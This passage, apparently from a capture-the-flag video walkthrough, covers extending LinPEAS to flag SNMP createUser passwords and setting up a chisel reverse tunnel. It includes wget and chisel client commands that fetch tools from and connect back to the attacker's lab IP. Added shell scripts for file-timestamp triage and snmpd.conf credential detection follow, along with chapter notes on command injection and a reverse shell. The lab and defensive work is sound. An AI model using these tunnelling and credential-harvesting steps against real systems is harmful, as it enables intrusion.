thing to analyze SNMP specifically and doesn't catch the createUser at all, right? So this is the thing that we want to update. So if we go into, um, /opt where we have committed this, so this is where LinPEAS is installed, I'm going to do a git pull to make sure I am up to date, and then I'm going to do code . to open this up in VS Code, and we can take a look at kind of how it runs. So LinPEAS is, when you, um, commit on it, it's a bit weird because it uses this Python builder to copy a bunch of files into one, right? So what I want to do is find where SNMP is, so if we Ctrl+F, or Edit, Find in Files, we can search SNMP and we see it's in software information, it's running ps, SNMP, winPEAS file analysis, file info. These are .NET when it ends in .cs, so I'm going to ignore that. Um, we do have sensitive files, so if I look at sensitive files we see the name SNMP, auto check, I think this is just going to be if it's a quick check or not, and the way the file, snmpd.conf, and bad regex. I'm guessing it's going to be, um, bad is subjective, right, when I first think of bad regex these are like things I don't want to match against, but this is what I do want to match against, and it's bad, well, it's not bad to have them in the config. Um, the bad regex is what's going to be shown, so we have our rocommunity, rwcommunity. If we go back to our box we see rocommunity here, right, so that's probably why these are getting shown. So we want to add a createUser, right, and I only care about users, um, when it starts with createUser, probably. If we go with this, yeah, so I'm going to put one for createUser like this and then we're going to save it, and then we have to build, uh, LinPEAS. So let's go into linPEAS and then go to builder. I can probably python3 linpeas_builder.py, and it errored. Let's see, does LinPEAS, does he have any instructions for building? Contributing, check out TODO, so these are things that he wants added into LinPEAS, that's not how to contribute. It's auto built, auto builder from
linpeas_builder, huh? So I'm going to go in the parent directory real quick, I'm going to grep this for linpeas_builder. We do have this pycache, no, it's not py, there we go, so we have a GitHub workflow and that's probably how this is being built. So if I look at this file, builder, so it makes sure PyYAML is installed, goes into linPEAS, and then runs this module, okay, so that should be simple enough. So I'm going to go into linPEAS, run the exact module that it said, and here it is going to start building a new copy of LinPEAS. So with this copy hopefully it has the createUser check, and then when we run it against it we'll see if, um, the SNMP config shows us, um, what we want, right? There we go, it is now done. If I do an ls, I'm guessing it's linpeas.sh, so I'm going to grep createUser on linpeas.sh, and we have the regex we have created. So let us python3 -m http.server to host this. We probably should delete this web server, start this one up, and then we can run this again, and this time hopefully when we grep it for the super secure password it will show us the line that we want. Okay, LinPEAS has finished, so let's run the same grep we did before on linpeas.out and we can see it has now found the password. So we are now free to create a pull request on LinPEAS and add our check in, so we will always see these createUser things. So with that being said, that's going to be the box, hope you guys enjoyed it, take care, and I will see you all... actually, not the end of the video. There are two more things I wanted to show that I couldn't find a good place to sneak into the video. The first piece is just simply using chisel to forward Postgres to our server so we don't have to modify the web server code in order to get the password, because that is a dangerous thing to do: if you screw up the code, the web server goes down, you lose your shell, and you also lose your access. So doing chisel to just forward Postgres is going to be the easier thing, and then after that we're going to fix up
the FastAPI, do some development. So yeah, hope you enjoy the additions. So let's say we can run chisel on this box, which we could have in the first place, so let's get it on there. So let's do python3, um, http.server. Um, before I download it I'm going to cat db.py, I'm going to copy the Postgres URL and we're going to just save it on this pane, right? So let's go /dev/shm, wget 10.10.14.8 port 8000, and I will download chisel like that, and it's going to take a minute to download. And on this pane we can start up a chisel server, so I'm going to ./chisel server --reverse, and by default I want to say it listens on port, um, 8080, so I'm going to change it to 8001. So in this pane we can connect a client to it, and Postgres, um, I forget what port it runs on by default, I want to say like five four three two one, so let's do psql -h, or --help, 5432 is the default port of Postgres. So let's do chisel and then client and we can connect to 10.10.14.8 port 8001 and we're going to do a, um, reverse on port 5432, 127.0.0.1:5432. Uh, permission denied, let's move chisel to /tmp because I guess we can't execute out of /dev/shm. Run this, and I don't see it connecting back to me, so I must have the syntax wrong. Let's see, do we have nc on thi
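The find and stat timestamp triage walked through above, as an added example that is not from the video; it assumes GNU find and GNU stat, and the directory, file names and dates it creates are constructed for the demo:

```shell
#!/bin/sh
# Added example, not from the video: the timestamp triage done by hand above,
# wrapped in functions. Assumes GNU find and GNU stat (Linux). The directory,
# file names and dates below are constructed for the demo; on a real host you
# would point find_modified_window at /etc as the video does.

# Regular files modified on or after $2 and before $3 (dates as YYYY-MM-DD).
# Same shape as the video's:
#   find /etc -type f -newermt 2022-06-04 ! -newermt 2022-06-14 -ls 2>/dev/null
find_modified_window() {
    find "$1" -type f -newermt "$2" ! -newermt "$3" -print 2>/dev/null | sort
}

# Sub-second part of a file's modification time (nine digits from stat %y).
# Files unpacked from a .deb carry whole-second timestamps from the archive, so
# an all-zero fraction is the "not user created" hint mentioned in the video.
mtime_fraction() {
    stat -c '%y' "$1" | sed -E 's/^[^.]*\.([0-9]+).*/\1/'
}

# Succeeds (exit 0) when the modification time has no sub-second component.
has_whole_second_mtime() {
    case "$(mtime_fraction "$1")" in
        *[1-9]*) return 1 ;;
        *)       return 0 ;;
    esac
}

# Constructed tree: one file before the window, one inside it, one after.
make_sample_tree() {
    mkdir -p "$1/ssh"
    printf 'Port 22\n' > "$1/ssh/ssh_config"
    touch -d '2022-02-25 12:00:00' "$1/ssh/ssh_config"   # shipped by the package
    printf 'Defaults env_reset\n' > "$1/sudoers"
    touch -d '2022-06-07 09:30:00' "$1/sudoers"          # customised after install
    printf 'x\n' > "$1/later.conf"
    touch -d '2022-06-20 00:00:00' "$1/later.conf"       # after the window
}

if [ "${1:-}" = "--demo" ]; then
    root=$(mktemp -d)
    make_sample_tree "$root"
    echo "Modified between 2022-06-04 and 2022-06-14:"
    find_modified_window "$root" 2022-06-04 2022-06-14
    rm -rf "$root"
fi
```

Run it with `--demo` to see only the file customised inside the window; `has_whole_second_mtime` is the scripted form of the "all zeros" check on the fractional timestamp.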
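The snmpd.conf review and the createUser regex added to LinPEAS above, as an added example that is not from the video or the LinPEAS project; the sample configuration it writes is constructed, and the directive names it matches are taken from Net-SNMP's configuration syntax:

```shell
#!/bin/sh
# Added example, not from the video or the LinPEAS project: a stand-alone version
# of the snmpd.conf review above. It drops comment and blank lines the way the
# video's "grep -v '^#' | grep ." does, then flags directives that carry secrets:
# rocommunity/rwcommunity and com2sec (v1/v2c community strings) and createUser
# (an SNMPv3 user with its authentication passphrase), which is the pattern the
# video adds to LinPEAS. The sample config below is constructed for the demo.

# Effective (non-comment, non-blank) lines of an snmpd.conf.
snmp_effective_lines() {
    grep -v '^[[:space:]]*#' "$1" | grep .
}

# Lines that disclose a community string or an SNMPv3 user passphrase.
# -i keeps the match case-insensitive, as Net-SNMP accepts directive names.
snmp_cred_lines() {
    snmp_effective_lines "$1" \
        | grep -Ei '^[[:space:]]*(r[ow]community6?|com2sec6?|createUser)[[:space:]]'
}

# Number of credential-bearing lines, for use in scripts and tests.
snmp_cred_count() {
    snmp_cred_lines "$1" | wc -l | tr -d ' '
}

# Constructed sample: looks like a packaged default plus a few live directives.
# The commented-out createUser must not be reported.
make_sample_snmpd_conf() {
    cat > "$1" <<'EOF'
# /etc/snmp/snmpd.conf (constructed sample)
agentAddress udp:127.0.0.1:161
#rocommunity public  default    -V systemonly
rocommunity internal default
com2sec readonly default internal
sysLocation Sitting on the dock of the bay
# createUser authOnlyUser MD5 "remember to change this password"
createUser bootstrap MD5 ExamplePassphrase_ChangeMe
EOF
}

if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp)
    make_sample_snmpd_conf "$tmp"
    printf '%s credential line(s) in %s:\n' "$(snmp_cred_count "$tmp")" "$tmp"
    snmp_cred_lines "$tmp"
    rm -f "$tmp"
fi
```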

Original Description

00:00 - Intro
01:00 - Start of Nmap
03:30 - Enumerating for virtual hosts with ffuf to find the api.mentorquotes.htb page
05:30 - Talking about FastAPI, attempting to utilize the endpoints but Authentication is required. Create an account
07:00 - Logging into the endpoint, discovering how to send authentication to the endpoints. Don't really gain anything
10:40 - Using ffuf to search for extra endpoints and discover /admin/ but can't do anything
14:00 - Running NMAP again with UDP to discover SNMP
17:10 - EDIT: Showing the minrate with nmap to scan UDP much quicker
18:30 - Using SNMP Walk
19:40 - Using SNMP-BRUTE to bruteforce other community strings
20:45 - EDIT: Showing Hydra and OneSixtyOne fail to enumerate the second community string
23:05 - Using SNMPBruteWalk to dump the SNMP Database, showing how much faster it is than SNMPWalk
25:00 - SNMP Shows running processes and arguments, there was a password passed via STDIN and we can get the password and login as James on FastAPI
28:15 - Accessing the Admin Endpoint, and figuring out what parameters it expects via error messages
30:50 - Discovering command injection in the backup endpoint
35:19 - Shell returned!
37:30 - Editing the User Endpoint in FastAPI to dump password hashes. Talking about Pydantic
40:45 - EDIT: Showing how we could background our reverse shell with nohup so we don't hang the webserver
47:15 - Cracking the hashes and getting svc's password and then logging into the server via SSH
53:00 - Doing some light forensics looking for files edited on the box shortly after linux was installed
56:45 - Finding a password in the snmpd config which gets us root
01:01:10 - Editing LinPEAS to add an extra regex to pull passwords out of SNMPd configuration
01:04:30 - Rebuilding the LinPEAS Shell script and then running LinPEAS to discover we now detect the password in SNMPD
01:06:40 - Forwarding PostGres to our server with chisel so we can dump the database
01:12:20 - Enumerating PostGres manually to dump